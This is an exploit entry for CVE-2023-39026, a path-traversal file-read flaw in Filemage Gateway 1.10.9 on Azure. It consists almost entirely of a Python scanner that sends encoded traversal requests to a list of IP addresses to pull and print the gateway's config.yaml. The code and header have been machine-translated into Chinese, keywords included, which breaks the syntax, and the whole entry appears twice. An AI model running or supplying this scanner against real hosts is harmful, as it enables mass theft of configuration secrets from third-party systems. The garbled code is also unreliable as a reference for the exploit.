#利用标题: Filemage Gateway 1.10.9-本地文件包含
#日期: 8/22/2023
#利用作者:布莱斯'raindayzz'harty
#供应商homepage: https://www.filemage.io/
#版本: Azure版本1.10.9
#测试在:所有Azure部署1.10.9
#CVE : CVE-2023-39026
#技术博客-https://raindayzz.com/technicalblog/2023/08/20/filemage-vulnerability.html
#来自供应商的补丁-https://www.filemage.io/docs/updates.html
导入请求
进口警告
警告。FilterWarnings(“忽略”)
DEF Worker(URL):
响应=requests.get(url,verify=false,timeout=.5)
返回响应
def main():
listip=[]
file_path=输入('输入包含IP地址的文件的路径:')
用file:打开(file_path,'r')
ip_list=file.read()。splitlines()
搜索string='tls'
对于IP_LIST:中的IP
url=f'https://{ip}' + '/mgmnt/.%5c.%5c.%5c.%5c.%5c.%5c.%5c.%5c.%5c.%5c.%5c.%5c.%5c.%5c.%5c.%5c.%5c.%5 c .%5C .%5C .%5C .%5C .%5C .%5C .%5C .%5C .%5C .%5C .%5C .%5Cprogramdata%5Cfilemage%5cgateway%5cgateway%5cconfig.yaml''
TRY:
响应=工人(URL)
#print(wendys.text)
如果在响应中搜索string.text:
打印('脆弱的IP:' + IP)
打印(响应。文本)
listip.append(ip)
除了requests.exceptions.requestexception为e:
print({ip} : {str(e)}'发生f'Error
对于listip:中的x
打印(x)
如果name=='__ -Main __':
主要的()
#日期: 8/22/2023
#利用作者:布莱斯'raindayzz'harty
#供应商homepage: https://www.filemage.io/
#版本: Azure版本1.10.9
#测试在:所有Azure部署1.10.9
#CVE : CVE-2023-39026
#技术博客-https://raindayzz.com/technicalblog/2023/08/20/filemage-vulnerability.html
#来自供应商的补丁-https://www.filemage.io/docs/updates.html
导入请求
进口警告
警告。FilterWarnings(“忽略”)
DEF Worker(URL):
响应=requests.get(url,verify=false,timeout=.5)
返回响应
def main():
listip=[]
file_path=输入('输入包含IP地址的文件的路径:')
用file:打开(file_path,'r')
ip_list=file.read()。splitlines()
搜索string='tls'
对于IP_LIST:中的IP
url=f'https://{ip}' + '/mgmnt/.%5c.%5c.%5c.%5c.%5c.%5c.%5c.%5c.%5c.%5c.%5c.%5c.%5c.%5c.%5c.%5c.%5c.%5 c .%5C .%5C .%5C .%5C .%5C .%5C .%5C .%5C .%5C .%5C .%5C .%5Cprogramdata%5Cfilemage%5cgateway%5cgateway%5cconfig.yaml''
TRY:
响应=工人(URL)
#print(wendys.text)
如果在响应中搜索string.text:
打印('脆弱的IP:' + IP)
打印(响应。文本)
listip.append(ip)
除了requests.exceptions.requestexception为e:
print({ip} : {str(e)}'发生f'Error
对于listip:中的x
打印(x)
如果name=='__ -Main __':
主要的()